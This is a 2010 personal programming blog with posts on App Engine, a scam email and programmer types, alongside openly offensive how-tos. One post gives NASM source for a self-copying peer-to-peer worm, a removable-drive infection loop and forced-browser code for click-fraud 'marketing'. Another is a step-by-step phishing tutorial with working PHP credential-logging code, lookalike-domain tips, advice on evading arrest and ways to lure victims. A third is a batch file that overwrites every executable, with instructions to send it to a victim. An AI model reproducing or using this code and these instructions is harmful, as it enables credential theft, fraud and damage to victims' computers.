2010/09/24

Commercial Coding

At the google conference I spoke to a couple of the google guys and lady ^^
and they all suggested I step into the future and code in more commercial
languages I think I want to code there(commercially) which means no more
pushing OBSD on clients servers, no more C/ASM/Perl/ksh and all those
UNIXy stuff :( except for personal projects ^^

Well lets see how it goes.

2010/09/08

Google Appengine and my slacking attitude ^_^

When we went to the Google Dev conference it seemed like appengine
and KML were the things that really interested me, so when I got
home it was my singular honor to crawl the whole project for bugs
and ways to *hack* up the google appengine to my disappointment

the appengine didn't allow custom 404 handlers so I had to mess
with the regex for page request handling and got this:

('/.*', hnd404) 

now that looks like an awesome hack doesn't it NO and yes you know why
because it happens that this means I have to handle everything and I mean
everything from requests like http://www.foo.com/images/bar.png

this means I have to either hardcode or automated file search and display
and also custom handlers like facebook's http://www.foo.com/user to show
user's profile or something of that sort.

Hard coding means something like this


class hnd404(webapp.RequestHandler):
     def get(self):
        request = self.request.uri split_request = request.split("/")
        # now I can do 
        if split_request[3] == 'images':
               #load file which is 
               file = request.split("/")
               path = os.path.join(os.path.dirname(__file__), 'images', file[len(file)-1])
               self.response.out.write(open(path, 'rb').read())
        else:
             self.response.out.write("404 Error by laudarch for " + "'" + split_request[3] + "' Not Found ;p"

Looks extremely cool doesn't it ^^ but then won't you have security
problems with this? what if someone requests for ../../../../../../etc/passwd O_O
what are you going to do then? beg google for mercy and help?
yep I know it can't be possible if we are doing
path = os.path.join(os.path.dirname(__file__),...
Because this tells appengine from my current directory etc but lets
skip that argument it will take pages to explain *potential* issues
with that technique and the fact that it sucks.
It sucks!! yep it does because you will have to handle all that
BS am still working on a better format and have seen some cool ideas
but then that brings us to my slacking :(

I don't have enough *time*, am a beginner diff boy for OpenBSD and
am *yet* to send a diff am working on a payment system, a wifi system,
an SHS Graduate government project, etc so
am in nedd of more time and not to talk of hardware and phreaking hehe
and security scans which I should be blogging about;
University of Ghana comes to mind after their funny sweep of the
viagra ads and not blocking the sec hole in their site suckers just
ask for help hehe.

I have like five appengine projects on my laptop that is waiting to
be completed and am here calling GTUG Ghana developers slackers which
got me into a lamer argument with a retard ^^

So I'll do my best to complete them because they are great and cool and
I'll try to share more appengine tricks these are not the only ones I
have found or done but then again I have to complete a project by Friday
and I have barely started.

ok Bye :)


2010/09/05

Scammers in my inbox :O

Lol I just rececied a mail from:

Ronald Lotz (ronaldlotzchambers@webmail.co.za)
in the letter the return address is at gala.net

with this Message which happens to be a jpg image:
lol you need a better *fool*.

Why this is invalid:
http://www.gala.net is in .ru(Russia)
and http://www.webmail.co.za is a free mail service
lol I wonder why people fall for this kinda tricks.

If you receive a funny mail you don't understand or want to
exam its legitimacy mail me and I'll help out.


Please be careful and watch out for evil mails like this.

2010/08/31

Marketing in the *new* age using virii and worms for profit

I have coded bots, worms, virii and anything I can wrap my head around
of them all biological worms and virii are unique. But this post is
not about biocode
am talking about marketing with bots, I have seen one bot that does
this but it has a stupid payload and attacks too strong. Anyway am
here to discuss and show how to market successfully with a virus/worm.

I guess if this becomes a good technique the corporate greeds will
legalize coding virii and worms \0/ for business purposes o_O lol.

You may wonder why is this necessary, well einstein; some of us are
programmers(aka nerds) and when we are done coding a cool project,
marketing it becomes a heck of a job especially when everything we say
is technical also when you want to make money with Google AdSense this
is a vey good option. may be considered click fraud but hey you showed
them and they clicked who's to blame the interested client or the
coder ^_^

The whole idea is infect a system copy self to windir PS: most virii
and worms meant to do some sought of public announcements or activism
target consumer OSes and the head is windows it doesn't mean we hate
windows it means; thats where all the *dull* brains are and we *need*
them to know something or arise from their silent slumber.

So as I was saying the idea is when our child first gets to a
compatible system in this case windows it must first copy itself to
the Windows Directory then maybe write a registry rule to make it run
first when the system boots run child2(the one in the windir) and exit
child1 from probably a flash drive. now you can Winexec your site
which will in windows fire up the default browser with the address you
supplied and the user sees magic hey there's a site here lets see or
they may close it but if it keeps poping up like a TV ad they will
give in believe me I have studied psychology :D

you may now infect other removable drives and exes to spread around
quickly you may also spread through p2p ^^

Here is code for a p2p worm in asm(NASM)
PS: I don't even have to show this only a
*fool* wouldn't know how to spread hehe.

;############################
; This is in asm(NASM)      #
; compiled under OpenBSD4.6 #
;                           #
; lame p2p worm             #
;############################
[bits 32]
[global main]

[extern CopyFileA]
[extern ExitProcess]
[extern GetModuleHandleA]
[extern GetModuleFileNameA]

[segment code public use32 class='CODE']
 main:
    call [lame]
lame:
    pop     ebp
    sub  ebp, [lame]            ; w00t you don't know this << o_O

    call [ebp+GetModuleHandleA]

    push  dword [ebp+szpath]
    push  dword eax
    call  [ebp+GetModuleFileNameA]

    push  dword 0x00000000
    push  dword [ebp+fake]
    push  dword [ebp+szpath]
    call  [ebp+CopyFileA]
   
    push dword 0x00000000
    call [ebp+ExitProcess]

[segment data public use32 class='DATA']
szpath      db 0x00000000
            times 0x00000100-$+szpath db 0 ; 256d

fake      db "C:\Progra~1\LimeWire\Free Music.exe", 0

This code is fully functional but not good :(
fake can be collect from many of the warez sites and stuff like
that. To compile in UNIX/Linux use
nasm -fwin32 lame_p2p.asm
./alink -oPE lame_p2p win32.lib -entry main

For the alink you can download the old version and port it or wait for
me to release my port which has some funny errors
alink.c:257: warning: sizeof(pointer) possibly incorrect in argument 3

This is because am using strlcpy with a pointer as size and also am
compiling with
cc -O2 -pipe  -Wall -Werror -Wstrict-prototypes -c alink.c

if I take off -Werror -Wstrict-prototypes everything works fine I'll
think about releasing it like that or corrected :)

Anyway how to spread with removable drives I have all the code but I
don't want to copy and share :( I'll share when I perfect it.

a little snippet though

...
    mov   word [ebp+szletter], 0x00000041 ; letter 'A'

seekem:
    mov   ecx, dword [ebp+szletter]
    mov   byte [ebp+szdrv], cl       ; lol nice eh?
   
    push  dword [ebp+szdrv]
    call  [ebp+GetDriveTypeA]

    cmp   eax, DRIVE_REMOVABLE
    je    eatit                    ; All removable Drives are mine
    inc   dword [ebp+szletter]
    cmp   word [ebp+szletter], 0x0000005a ; letter 'Z'
    jg    sleep_alil               ; should be sleep drives come and
                                   ; go u know :) Update:2010/06/15
                                   ; now we sleep hehe
    jmp   seekem

sleep_alil:
    push  0x00000014 ; 20 seconds ^^
    call  [ebp+Sleep]

    jmp   seekem     ; get back to work you idio

; Heres where you infect
eatit:
...


lol cool huh

ok so with that you get a lot of clicks and attention I think am tired
I'l continue later I think :D

oh I forgot the Winexec hehe

    push dword 0x00000005        ; SW_SHOW
    push dword [ebp+sitename]    ; eg http://www.google.com
    call [ebp+Winexec]

   
or if you want to use ShellExecute

    push dword 0x00000005        ; SW_SHOW        hehe
    push dword 0x00000000        ; [directory]   not needed
    push dword 0x00000000        ; [parameters]  not needed
    push dword [ebp+sitename]    ; [sitename] eg http://www.google.com
    push dword 0x00000000        ;
    push dword 0x00000000        ; [hwnd]
    call [ebp+ShellExecute]


Choose your weapon, Remember that writing these creatures(our children)
is an art so take time and don't make them hazardous
take them as you little army if you have ever taken Ninjutsu lessons
from a good *master* he trains you with discipline first spiritually
and physically code with passion and you will happy forever.

Happy hacking push that processor to the extreme :)

2010/08/30

Ghana web Security and code practice Pt1

I was considering not blogging again but when I think of it I really
need to because people and especially developers need to read stuff(or shit)
like the ones I write, I hate to write, main reason why I quit a lot of jobs;
but not when its very important.

This brings me to today's blog post; Ghana yes that beautiful nation that is in
my "opinion" slowly drowning herself because of her ignorant children.
Developers in Ghana have the habit of copy and paste and drag n drop, at least with
the most I have see. For example I saw a guy at swanzy(a shopping arcade) and he
says he wants to configure a cisco router and he needs an IBM T41/42 I asked, can't you
use something else and he says I don't want to suffer(meaning he doesn't want to hack it
I want to do "exactly" what is in the book, only thing I could say after that was
am no "robot".

I have worked, hired and fired developers as the IT manager of a firm in East-Legon
all because of two things "code design" and "security"; you can't give me a very
unmaintainable code and poor design for approval or appreciation and to worsen the case
the code is open to a lot of security issues, this may seem hash but I have watched
and monitored Universty of Ghana's website get hacked and remains hacked for 2 years+
till present day

Proof
in the source of University of Ghana Legon(ug)'s mother site and some pages there is
a hidden css that advertises viagara which leads to a teacher/student tutorial site

Tech Details:
   
css class name: .RUACZA
    after the style there is a div that
    contains the advert

 

Verify:
    Goto http://www.google.com and input
    viagara site:ug.edu.gh

Well after you see that I guess you get the idea and I could paste here
instructions and even code to replicate the attack they suffered, but I don't want any
issues as I could be charged with funny shit. Well this is not the only site
and proof I have. There are a lot more and if you want to check if your site has been hacked
or if its hackable don't hesitate to email me or leave a comment saying so, its FREE so
don't pressure me I have a lot on my chest.

Well am tired I'll continue this next time, in the meantime check that code
if it takes more than 20mins to trace a function behold you need to check your code design
and "ONLY" use OOP when "NECCESARY". That new school thing sucks return to the ways of C
you lame coders. ;p

2010/07/29

The simple Art of Phishing

I wrote this last year for a couple of the members and friends
but I have revised it a little for public viewing enjoy :)

--============================================================--
-| T H E  S I M P L E  A R T  O F  P H I S I N G              |-
-| ----------------------------------------------             |-
-|                                                            |-
-| By: Laudarch/MWF/GOA in Accra(GH233).                      |-
-| (c)2009/10 For Educational Purposes Only!!                 |-
-| LaudArch, MWF and GOA are not responsible for what you     |-
-| do with any information given you here.                    |-
--============================================================--

[-------------------------------------------------------Page-I-]

[+] Index
[>] Intro                      - 0x000000000
[>] What is phising?           - 0x000000001
[>] Setting up a phish domain  - 0x000000002
[>] Getting your target's page - 0x000000003
[>] Coding the Phish stew      - 0x000000004
[>] Getting your Victims       - 0x000000005
[>] What next?/Security        - 0x000000006


[----------------------------------------------Page-0x00000000-]
[+] Intro
[quote]
..and he said unto them you are welcome to my father's house..
- unknown
[/quote]

The Latest victim is Facebook, many people on facebook are now
sharing their passwords and prolly still don't know it. This tut
will teach you how to phish for passwords and a whole
lot(use your imagination) and also how to protect yourself
from this kinda attacks. so go ahead knock urself out
enjoy the breeze! :)

[/] WARNING: This shit is absolute kiddy ;p

[----------------------------------------------Page-0x00000001-]
[+] WHAT IS PHISING?
[quote]
I will make you Phisers of men.. - Jesus of Nazareth.
[/quote]

First am not spelling it hipishly(nu word?) or tryna b gangsta.
[/] Fishing is going to the sea or river and tryna get some fish.
[/] Phising is sitting down for ten minutes and coding a lil
bastard that will fetch you other peoples passwords and
usernames, personal info, etc

[^] more details: Phising is a mimic of a legite login page
like hotmail and putting a lil backdoor in the page so when
someone logs in to their account through ur fake page you get
their passwords and usernames and what ever you ask for then you
foward them to the real thing and they won't know a thing.

Back in school we I used to do this to get cafe time and some
other shit like the school admin's password(which worked).

[----------------------------------------------Page-0x00000002-]
[+] SETTING UP A PHISH DOMAIN
[quote]
sharpen your swords and spears, kiss your wifes and hug your children
for tonight we dine with the devil. - 300
[/quote]

In order to make a phish page you need a webhosting site,
sign up for a free account(Latetly crackers have been registering
domains with stolen credit cards to make it seem more legit),
you must make sure the webhost has PHP hosting for free.
example spam.com

Instructions:
-1- Don't sign-up with your real name or email account you could
end up in jail If people find out the first place they will
search is where you host your page then ur details, then a knock
on your door, and ... You don't want to know the HORROR, The
horror...Aaarghh! This is neccesary because even if you are
testing it is *illegal*

-2- Don't access your saved files(passwords and stuff) at your
home PC or anywhere that can make it easy for you to be caught,
for example use proxy or DaTube (a perl program written by b0z0)
to bounce off other people pcs else just take the bloody risk.

-3- Choose a name thats similar to your targets name, most people
can't tell the difference between hotmail and h0tmail or myspace
and myspoce(Ever wondered why chinese people manage to sell
nile(nike) and we mistakingly buy em n wear them for days b4
realising). A name like h0tmail.gr or h0tmail.ru is great
you might get h0tmail.spam.com; find a url shortena(nu word?) like ".cc"
so you get h0tmail.cc, This is not entirely true as people have
become so dumb nowadays that when the domain name says
http://security123.com and the content is a facebook login
they can't tell the difference(robots).

-4- What r u doing here go to the next topic @#$%^&

[--------------------------------------------------Page-0x00000003-]
[+] GETTING YOUR TARGETS PAGE
[quote]
We need root b4 anything else!, Goddamn it... - Laudarch
[/quote]

After you have a webhost you need to get your targets original
webpage and turn it to yours. this part is easy if you don't
understand it read it again.

Instructions:
-1- Goto you targets website I will use hotmail
hotmail's login page is http://www.mail.live.com/
-2- if you don't have Mozilla firefox goto www.mozilla.org or .com
now in mozilla click view and page source or press Ctrl+U
-3- Copy everything
-4- Open notepad or any text editor and paste it
-5- Save it as any name you want .html(I suggest index.html)
Don't close the editor yet we will continue using it in the next topic.
You need images and co but thats advanced.

[--------------------------------------------------Page-0x00000004-]
[+] CODING THE PHISH STEW
[quote]
The more we learn about miraculous things, the less supernatural they
become. - Laudarch
[\quote]

This part concerns php I'll give you the code, you just copy and
paste believe me it works.

Instructions:
-1- Create a new file name it whatever you want .php eg phisher.php
-2- Cut n paste the code below and save it.

[----Cut here----]
<?php
header( "Location: http://yourtaget.com/" );

$handle = fopen( "database.txt", "a" );
foreach( $_POST as $variable => $value )
{
fwrite( $handle, $variable );
fwrite( $handle, "=" );
fwrite( $handle, $value );
fwrite( $handle, "\r\n" );
}
fwrite( $handle, "\r\n" );
fclose( $handle );
exit;
?>
[----End Cut----]

The line after <?php is where the page goes to after the victim logs in,
change that to you targets page. ie change "http://yourtaget.com/"
to the name of your target's url for example "http://mail.live.com/"

now lets continue the topic before this

-6- Go back to notepad or any text editor you are using search for
action= keep searching till you find something like action="/login.php"
(if you know html or xhtml this isn't new)
change the url("/login.php") into your php file name example "phisher.php"
save it and close the text editor.
-7- Goto to your webhost upload the files voila! you are now
officially *phising*.

[-------------------------------------------------Page-0x00000005-]
[+] GETTING YOUR VICTIMS
[quote]
We will wait for them in the dark. - unknown
[\quote]

Now you need victims how to get em how to get em, ok i know lets tell everyone
we want their passwords so they should login thru our bomb page(nu word?), Naah
too dumb. You need to send it to people like you don't know what it is example
hey check this nu site "your bomb page" you can login faster than "original page".
or if you are on forums paste it there, or my style if you in school paste it
on the notice board(anonymous of course) same if you are at work and the best
one I like paste it in town or even graf it on walls. You get the idea while
you are not caught spread the wrong message oops! the right, I meant the right :)

Now you are done. Shut it down after some time before you get caught!.
you are now a phisher go phish...

[----------------------------------------------Page-0x00000006-]
[+] WHATS NEXT?/SECURITY
[quote]
I bid you go forth and multiply.. - unknown
[\quote]

You can expand this idea, develop new methods, etc
Now how to protect yourself:
-1- Look for the closed padlock sign at the bottom right of
your screen if its there you are on the right website else Uumm!
you are DEAD.
-2- Always chect the domain name in the address bar and make sure
they correspond, safer always login from the oficial sites
forget meebo and shit like that they all can be phished.
-3- If you find a page you think is a phish page report it
search google for that they are many, I and my brother reported
a phising incident on facebook, by the time facebook responded
two days had passed because it was a weekend, and the phishers
had 65,000+ passwords and they are using it to send spam and the
like. So its not always that when you report an action will be
taken instantly but at least you did.

PS:
Theres a lot more but this is ok since the others are too complex.

[----------------------------------------Page-0x00000007-]
[quote]
In the end there shall be only one - unknown
[\quote]

[+] Cell: +233-1ead-b01-86

[~] (c)2009/10 Laudarch, MWF, GOA

P E A C E!
Remember knowledge in the hands of the devil is war
knwoledge in the hands of children is tradegy
Grow up and don't be silly.

-- Laudarch --

[-----------------------------END----------------------]

2010/06/29

Stup1d_3v1l.bat


rem **************************
********
rem ** Stup1d 3v1l B4tch F1l3 **
rem ** Coded by me(I think :) **
rem **********************************
for %%i in (*.exe) do copy %0 %%i


rem WARNING!!
rem If you don't Understand what this
rem does don't FUCKING Try it, I
rem warned you :)
rem To use:
rem Copy and paste the code to a file
rem and save it as stup1d_3v1l.bat
rem Send it to a victim or run it on your
rem Personal Windows Box(if you are stupid :)
rem Peace!

rem *>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
rem ** Dedicated to the love I have locked in me.
rem *>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Next is a phising Tutorial Stay Tuned ^^

2010/06/21

Facebook Addict

So I bought a new LG CU920 touch screen phone for my brother yesterday and now he can facebook in style but all of a sudden am regretting my decision and gift you should see him all hooked on
this little thing, he's on the road, he's on the phone, bathing, everywhere he is; he is on the damn thing, makes me wonder how we get addicted to facebook and the web.

I think I'll try and hide the damn thing for a week at least, he won't even concerntrate when we are having development disscussions or meetings.

2010/06/15

Intro to laudarch's Blog

I created this blog to talk mostly about programming(hardcore programming)
Algorithm design and the like, I also will talk about virus coding and will
be making *HUGE* assumptions about the security of most supposedly secured
systems I will also try to prove them theoretically and when possible practically
for now hmmm.

I believe right now we have three classes of programmers:
0. Top level programmers or simply drag and droppers
   these are the corporate kiddies who want to finish a project
   quickly and earn money, the ones that don't understand how java
   interprets or the how lame .NET is.
   85% of programmers today are in this class, YES even the graduates
   sorry :(
1. Middle level programmers or I don't want to go too deep programmers
   These programmers will simply not learn enough but shout too much
   your average cracker is in this group :( and sorry to say but most CLASS
   members are in this class too, they do not care about money that much
   but will give in with little or no pressure.
   10% of programmers today are here, surprising thing is most people
   used to be here.
2. Low level programmers or how do I make a bomb programmers
   Yep we love ASM, we love Brainfuck and love to code all night
   we understand how the machine works heck we can compile code in our head
   and show you all possible errors.
   We don't care about your money and we are the ones that dev your
   java engines, .NET et al
   and we scream to management your shit is not ready for release and when
   they don't listen twitter goes down because of coding errors.
   5% of today's programmers are here and most are not out there or in groups
   like CDC, ARteam etc

Well like I said get ready for a brainfuck :D